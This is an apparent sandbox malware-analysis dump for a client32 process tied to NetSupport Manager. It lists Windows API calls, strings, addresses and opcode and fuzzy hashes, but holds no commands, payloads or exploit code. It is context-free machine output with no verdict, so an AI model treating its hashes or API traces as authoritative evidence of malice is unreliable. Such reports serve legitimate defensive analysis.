                                                                                                                                                                • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                                                                                                • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 110037DF
                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110037FA
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 1100380D
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003824
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100383B
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 11003852
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 11003875
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100388C
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110038A3
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110038BA
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 110038D1
                                                                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 110038D8
                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FD), ref: 110038E6
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003902
                                                                                                                                                                • CreatePen.GDI32(?,00000001,00000000), ref: 1100390B
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11003919
                                                                                                                                                                • MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003932
                                                                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 11003946
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11003954
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100395E
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100396C
                                                                                                                                                                • CreatePen.GDI32(?,00000001,00000000), ref: 11003975
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11003982
                                                                                                                                                                • MoveToEx.GDI32(00000000,?,?,00000000), ref: 1100399E
                                                                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 110039B5
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 110039C3
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 110039CA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1903512896-0
                                                                                                                                                                • Opcode ID: 8760cecb2564344baf698d6dfb1889720b5fb5377f88e9846bce1803a3bf91cb
                                                                                                                                                                • Instruction ID: f431685d51201d56bfadd4982933ed8f3cc0d0135c34102d604ea9f22554572a
                                                                                                                                                                • Opcode Fuzzy Hash: 8760cecb2564344baf698d6dfb1889720b5fb5377f88e9846bce1803a3bf91cb
                                                                                                                                                                • Instruction Fuzzy Hash: D6816FB5900209AFEB14DFA5CC85EBFF7B8EF88704F104A18E611E7295D770A941CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(snmpapi.dll,?,00000000), ref: 1112B699
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpUtilOidCpy), ref: 1112B6C4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpUtilOidNCmp), ref: 1112B6D1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpUtilVarBindFree), ref: 1112B6DE
                                                                                                                                                                • LoadLibraryA.KERNEL32(INETMIB1.DLL), ref: 1112B70C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpExtensionInit), ref: 1112B724
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SnmpExtensionQuery), ref: 1112B731
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1112B75B
                                                                                                                                                                • _calloc.LIBCMT ref: 1112B78B
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1112B7FD
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1112B806
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad$CountTick_calloc
                                                                                                                                                                • String ID: ..\CTL32\tcputil.c$INETMIB1.DLL$SnmpExtensionInit$SnmpExtensionQuery$SnmpUtilOidCpy$SnmpUtilOidNCmp$SnmpUtilVarBindFree$result$snmpapi.dll
                                                                                                                                                                • API String ID: 1437035542-3101287369
                                                                                                                                                                • Opcode ID: fc1fd92616015cd47e86ff9b00b755c06122618403dc2c1f491a3f92d19b084c
                                                                                                                                                                • Instruction ID: f3295d9ca5358f7e019f9eca4ce7d23819ae9b382b39dc0ae2c11714c539106e
                                                                                                                                                                • Opcode Fuzzy Hash: fc1fd92616015cd47e86ff9b00b755c06122618403dc2c1f491a3f92d19b084c
                                                                                                                                                                • Instruction Fuzzy Hash: 1141BF35A002299BDB11DFB5DCD0A9EFBB8FB88719F5000BEE81993240DA75A945CF54
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116B974
                                                                                                                                                                • __mtterm.LIBCMT ref: 1116B980
                                                                                                                                                                  • Part of subcall function 1116B64B: DecodePointer.KERNEL32(00000006,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116B65C
                                                                                                                                                                  • Part of subcall function 1116B64B: TlsFree.KERNEL32(00000019,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116B676
                                                                                                                                                                  • Part of subcall function 1116B64B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 11173629
                                                                                                                                                                  • Part of subcall function 1116B64B: _free.LIBCMT ref: 1117362C
                                                                                                                                                                  • Part of subcall function 1116B64B: DeleteCriticalSection.KERNEL32(00000019,?,?,1116959F,11169585,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 11173653
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1116B996
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1116B9A3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1116B9B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1116B9BD
                                                                                                                                                                • TlsAlloc.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA0D
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA28
                                                                                                                                                                • __init_pointers.LIBCMT ref: 1116BA32
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA43
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA50
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA5D
                                                                                                                                                                • EncodePointer.KERNEL32(?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA6A
                                                                                                                                                                • DecodePointer.KERNEL32(Function_0016B7CF,?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BA8B
                                                                                                                                                                • __calloc_crt.LIBCMT ref: 1116BAA0
                                                                                                                                                                • DecodePointer.KERNEL32(00000000,?,?,111694DC,111DBD20,00000008,11169670,?,?,?,111DBD40,0000000C,1116972B,?), ref: 1116BABA
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1116BACC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                • API String ID: 3698121176-3819984048
                                                                                                                                                                • Opcode ID: 8ec48f1a047daf616742b568f1d57b4471b92bf0689ee590aef20c437b638c51
                                                                                                                                                                • Instruction ID: 8c197aedc407595bd33f0851878198814bb45be6e0f0f0d5f3e2140db13e3365
                                                                                                                                                                • Opcode Fuzzy Hash: 8ec48f1a047daf616742b568f1d57b4471b92bf0689ee590aef20c437b638c51
                                                                                                                                                                • Instruction Fuzzy Hash: A531A0B5A043269FD7019F768C94A4AFFA8FB4637C704063AE430C3298EBB28455CF54
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,59FD48C0), ref: 110F7616
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 110F76BF
                                                                                                                                                                • SetCursor.USER32(00000000,?,00000000,?,00000104), ref: 110F776E
                                                                                                                                                                • ShowCursor.USER32(00000000,?,00000104), ref: 110F777B
                                                                                                                                                                • OpenEventA.KERNEL32(00100000,00000000,NSLockExit,?,00000104), ref: 110F778C
                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F77B3
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F77CA
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110F77DB
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110F77E4
                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F77FB
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000104), ref: 110F780E
                                                                                                                                                                  • Part of subcall function 11145AE0: LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                                                                                                  • Part of subcall function 11145AE0: GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                                                                                                  • Part of subcall function 11145AE0: FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7826
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110F7837
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110F7844
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F7854
                                                                                                                                                                • ShowCursor.USER32(00000001,?,00000104), ref: 110F785C
                                                                                                                                                                • SetCursor.USER32(?,?,00000104), ref: 110F7869
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,0000004C,?,00000104), ref: 110F788E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$CursorLibrary$AddressDispatchFreeLoadMultipleObjectsOpenProcShowTranslateWait$CloseEventHandleVersion_memset_strncpy
                                                                                                                                                                • String ID: NSLockExit$SetProcessDPIAware$User32.dll
                                                                                                                                                                • API String ID: 2007862282-1780497338
                                                                                                                                                                • Opcode ID: 113c0b6181b972a0f2d320b7b092a92c9fbda70bcbeef0429ce4b10eb86d636e
                                                                                                                                                                • Instruction ID: 11ede5f5f02855a1c4c96f48d72256e6443f30e2e936632b213269d4ffb78123
                                                                                                                                                                • Opcode Fuzzy Hash: 113c0b6181b972a0f2d320b7b092a92c9fbda70bcbeef0429ce4b10eb86d636e
                                                                                                                                                                • Instruction Fuzzy Hash: 7E8150B1D04229AFDB14DF658C85BEEFBB8BB48708F4045E9E519E3240EB309A84CF51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11143110: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                                                                                                  • Part of subcall function 11143110: _strrchr.LIBCMT ref: 1114315A
                                                                                                                                                                  • Part of subcall function 11143110: _strrchr.LIBCMT ref: 1114316A
                                                                                                                                                                  • Part of subcall function 11143110: wsprintfA.USER32 ref: 11143185
                                                                                                                                                                • GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 111456D5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 111456E2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 111456EF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 111456FC
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 11145709
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 11145716
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 11145723
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 11145730
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 1114573D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 1114574A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                                                                                • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                                                                • API String ID: 3896832720-3703587661
                                                                                                                                                                • Opcode ID: 84df2d00e24e8d8ae3685d9949c465087890092b11522e3ff6f09728c44b768d
                                                                                                                                                                • Instruction ID: 73e471d2bd7e465e00d80a1379dd27e839b9bac49e05384ada1c81eae7e3fc15
                                                                                                                                                                • Opcode Fuzzy Hash: 84df2d00e24e8d8ae3685d9949c465087890092b11522e3ff6f09728c44b768d
                                                                                                                                                                • Instruction Fuzzy Hash: 2201CC7191127666D751BFBA9C98FC7FEEA9B89218B010476F068E3206D6B484448F94
                                                                                                                                                                APIs
                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 110EF57E
                                                                                                                                                                • GetStockObject.GDI32(0000000F), ref: 110EF592
                                                                                                                                                                • GetDC.USER32(00000000), ref: 110EF60A
                                                                                                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 110EF61B
                                                                                                                                                                • RealizePalette.GDI32(00000000), ref: 110EF621
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110EF63C
                                                                                                                                                                • SelectPalette.GDI32(00000000,?,00000001), ref: 110EF650
                                                                                                                                                                • RealizePalette.GDI32(00000000), ref: 110EF653
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110EF65B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1969595663-0
                                                                                                                                                                • Opcode ID: d9190b611ba9219ad8d2ec95f6d096b1821b31785eb756edf59b9680528b31f1
                                                                                                                                                                • Instruction ID: 22353c804f3d3f151c6f3a8f6fada681deec080e0441dcd20cd58669b66000eb
                                                                                                                                                                • Opcode Fuzzy Hash: d9190b611ba9219ad8d2ec95f6d096b1821b31785eb756edf59b9680528b31f1
                                                                                                                                                                • Instruction Fuzzy Hash: 8E7191B6E11228AFDB04DFA5CC88BEEF7B9FF48704F04412AF515E7244D67499018BA1
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 110F5988
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                • wsprintfA.USER32 ref: 110F59DA
                                                                                                                                                                  • Part of subcall function 110F33F0: LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                                                                                                  • Part of subcall function 110F33F0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
                                                                                                                                                                  • Part of subcall function 110F33F0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                                                                                                  • Part of subcall function 110F33F0: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                                                                                                  • Part of subcall function 110F33F0: GetLastError.KERNEL32 ref: 110F3470
                                                                                                                                                                  • Part of subcall function 110F33F0: Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                                                                                                  • Part of subcall function 110F33F0: CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                                                                                                  • Part of subcall function 110F33F0: LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                                                                                                • wsprintfA.USER32 ref: 110F5A1E
                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 110F5A4A
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 110F5A5C
                                                                                                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000), ref: 110F5A79
                                                                                                                                                                • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 110F5AE3
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B1E
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110F5B2C
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 110F5B38
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B43
                                                                                                                                                                • SetEvent.KERNEL32(00000270), ref: 110F5B5A
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 110F5B6C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B73
                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 110F5B7F
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F5B89
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$Close$CreateExchangeInterlockedNamedPipewsprintf$DescriptorErrorEventFileLastLocalSecuritySleep$AllocDaclFreeInitializeReadState
                                                                                                                                                                • String ID: VistaUIPipe%d$\\.\pipe\nsm_%s$\\.\pipe\nsm_vistapipe%d
                                                                                                                                                                • API String ID: 314772441-3428003663
                                                                                                                                                                • Opcode ID: 5edb563096daf5830fa12ef569c1a7c24e09949c0a52532e50ff9f61841b0b84
                                                                                                                                                                • Instruction ID: bc2e2c65ab037f4e49fc19a0848c9f8c0e457000ff0deb98ec24630af83a0244
                                                                                                                                                                • Opcode Fuzzy Hash: 5edb563096daf5830fa12ef569c1a7c24e09949c0a52532e50ff9f61841b0b84
                                                                                                                                                                • Instruction Fuzzy Hash: 5A619075E1022AABD715CF64CC85FDAB7B8BF0C714F104194E955A7280EBB5A980CFA0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __strdup_free
                                                                                                                                                                • String ID: CheckRMLocation, SetChannel to [%s]$CheckRMLocation, check machine key$CheckRMLocation, check user key$CheckRMLocation, opened user key$CheckRMLocation, read [%s] from config$Client$Current Location$CurrentLocation$IsA()$RM user location=%s, assumed roaming$RoomSpec$SOFTWARE\RM\Connect$SOFTWARE\Research Machines\Network Management\Location Chooser$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$wwww
                                                                                                                                                                • API String ID: 514621754-348489473
                                                                                                                                                                • Opcode ID: cd29cf232fe3fa5b76202ab786b7943c724fd67e21c77a8ff7effdeddf23fd08
                                                                                                                                                                • Instruction ID: be1923504c83985266732e1f2b9d3f53618397ddbaed6cfbbf11352fa9892fcf
                                                                                                                                                                • Opcode Fuzzy Hash: cd29cf232fe3fa5b76202ab786b7943c724fd67e21c77a8ff7effdeddf23fd08
                                                                                                                                                                • Instruction Fuzzy Hash: 96D1B179E1010A9FDB01DFA4DD90FEDF370AF9431DF408164E825A7389EA35A605C7A5
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105664
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F060C), ref: 1110567D
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105683
                                                                                                                                                                • wsprintfA.USER32 ref: 111056ED
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,?), ref: 1110572F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 111057B0
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 111057C9
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 111057FD
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105887
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C), ref: 11105890
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. simap lock held for %d ms, xrefs: 111058A4
                                                                                                                                                                • Session\%u\NSMWClass, xrefs: 111056E7
                                                                                                                                                                • PostMessage WMCLOSE to s%d (%d) ret %d, xrefs: 111057EB
                                                                                                                                                                • Error. IPC(%s) = %s, xrefs: 1110571D
                                                                                                                                                                • Warning. took %d ms to get simap lock, xrefs: 11105693
                                                                                                                                                                • Kernel32.dll, xrefs: 1110572A
                                                                                                                                                                • GetProcessId, xrefs: 111057A8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CriticalLibrarySection$AddressEnterErrorFreeLastLeaveLoadProcwsprintf
                                                                                                                                                                • String ID: Error. IPC(%s) = %s$GetProcessId$Kernel32.dll$PostMessage WMCLOSE to s%d (%d) ret %d$Session\%u\NSMWClass$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 3106348785-779848922
                                                                                                                                                                • Opcode ID: 1edc8b8ba17f787b1558616dea048ccbe520c70343026f8c3c0ffca6a3f3d5cc
                                                                                                                                                                • Instruction ID: 7ca66135e65bf27062c8b0cf46d1fba60d66d0776981d3ee52a2c48e780759e3
                                                                                                                                                                • Opcode Fuzzy Hash: 1edc8b8ba17f787b1558616dea048ccbe520c70343026f8c3c0ffca6a3f3d5cc
                                                                                                                                                                • Instruction Fuzzy Hash: 0E719CB1D012699FDB50DF66CD88A9EFBB5FB48304F9541EAD819A7211DB306E80CF90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • wsprintfA.USER32 ref: 110EB1B8
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110EB212
                                                                                                                                                                • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                                                                                                • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                                                                                • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                                                                                • API String ID: 3451743168-2289091950
                                                                                                                                                                • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                                                                                • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                                                                                                • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                                                                                                • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,00000001,00000000,?,?,?,11107655,00000000,000000FF), ref: 111254DA
                                                                                                                                                                • GetCurrentProcess.KERNEL32(FFFFFFFF,001F0FFF,00000000,00000000,?,?,11107655,00000000,000000FF), ref: 111254F6
                                                                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000,?,?,11107655,00000000,000000FF), ref: 111254FD
                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,?,11107655,00000000,000000FF), ref: 11125500
                                                                                                                                                                • GetExitCodeProcess.KERNEL32(FFFFFFFF,?), ref: 11125519
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ExitProcess), ref: 11125532
                                                                                                                                                                • CreateRemoteThread.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,00000000,?), ref: 11125551
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1112555D
                                                                                                                                                                • TerminateProcess.KERNEL32(000000FF,00000000), ref: 11125568
                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,?,?,11107655), ref: 111255CF
